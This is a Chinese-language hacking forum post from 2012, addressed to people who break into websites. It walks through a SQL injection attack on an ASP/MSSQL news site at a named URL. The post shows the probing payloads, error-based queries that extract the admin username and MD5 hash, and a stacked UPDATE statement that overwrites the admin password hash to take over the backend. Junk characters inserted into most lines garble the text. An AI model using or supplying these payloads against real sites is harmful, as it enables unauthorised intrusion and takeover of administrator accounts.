经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
+ u4 A. ]! f: e$ Q; W" N可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL); t! u% g" a/ H, }+ M; P
测试如下:, a3 N: V( O+ U' h7 \
http://www.tmdsb.com/news.asp?id=1218 C2 t! F7 L. G8 b
在地址后输入单引号,显示' ~3 `& D9 D: e z! `# |( @
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
5 l5 n8 n, `0 S# g0 d7 \字符串 ’’’ 之前有未闭合的引号( c* P( a+ }1 f1 [* j
/news/tmdws.asp,行63% Q! I7 ^( k9 z$ A
说明没有过滤单引号且数据库是MSSQL.2 R C7 H7 {# V+ y* C. L9 Y# n9 C5 N
and 1=1正常。and 1=2出错。肯定存在注入
9 Z8 f A' b. r& w( |# Y& I接着输入
9 K5 |: S% k0 H7 ]http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)+ U* w7 j7 M6 Y9 U9 F
得到帐号为:admin/ R; T: k+ a* c
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
# f& H! e* J& i6 i l g" ~得到密码为:a4716077c2ba075c
) f% j# c4 T" ?3 W接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
, u" A4 H% O4 D) C& r: u命令如下 :, ~5 ^: t! `( Y* E4 B9 ^& B
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–/ Q7 o8 N$ c6 g8 I
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41